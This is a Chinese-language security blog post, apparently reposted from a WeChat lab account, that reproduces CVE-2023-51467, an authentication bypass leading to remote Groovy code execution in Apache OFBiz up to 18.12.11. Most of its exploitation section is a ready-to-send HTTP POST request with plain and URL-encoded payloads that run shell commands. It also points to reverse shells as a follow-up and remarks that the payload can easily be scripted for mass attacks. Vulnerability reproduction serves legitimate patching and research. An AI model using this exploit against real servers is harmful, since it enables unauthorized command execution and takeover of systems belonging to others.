Apache OFBiz是一个非常著名的电子商务平台,是一个非常著名的开源项目,提供了创建基于最新J2EE/XML规范和技术标准,构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类WEB应用系统的框架。OFBiz最主要的特点是OFBiz提供了一整套的开发基于Java的web应用程序的组件和工具。包括实体引擎, 服务引擎, 消息引擎, 工作流引擎, 规则引擎等。
CVE-2023-51467
漏洞描述:
Apache OFBiz 在后台提供了执行groovy 代码的功能,但是由于存在认证绕过问题,攻击者可构造恶意请求绕过身份认证,利用后台相关接口功能执行groovy代码,执行任意命令,控制服务器。
影响版本:
Apache OFBiz <= 18.12.11
漏洞复现:
这里测试不编码也可以正常利用。
POST /webtools/control/ProgramExport?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1Host: xxxxxxCookie: JSESSIONID=BF77472F4A16EF66171A3FB075712EF2.jvm1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 150groovyProgram=import+groovy.lang.GroovyShellGroovyShell+shell+=+new+GroovyShell();shell.evaluate('"ping xxxx.org".execute()')
编码的Payload
groovyProgram=import+groovy.lang.GroovyShell%0D%0A%0D%0AGroovyShell+shell+%3D+new+GroovyShell%28%29%3B%0D%0Ashell.evaluate%28%27%22ping+ dnslog.cn%22.execute%28%29%27%29
Web响应界面,小阿三
DNSLog
利用思路举例:
Curl或反弹shell等
可以上号!不做示范了
1.该漏洞网上大佬分析的很详细,需要可以看一下。
2.Payload很简单就可以写成脚本就行批量攻击。注意防护,自已人不打自已人。
原文始发于微信公众号(YongYe 安全实验室):CVE-2023-51467__Apache OFBiz-RCE__手工复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论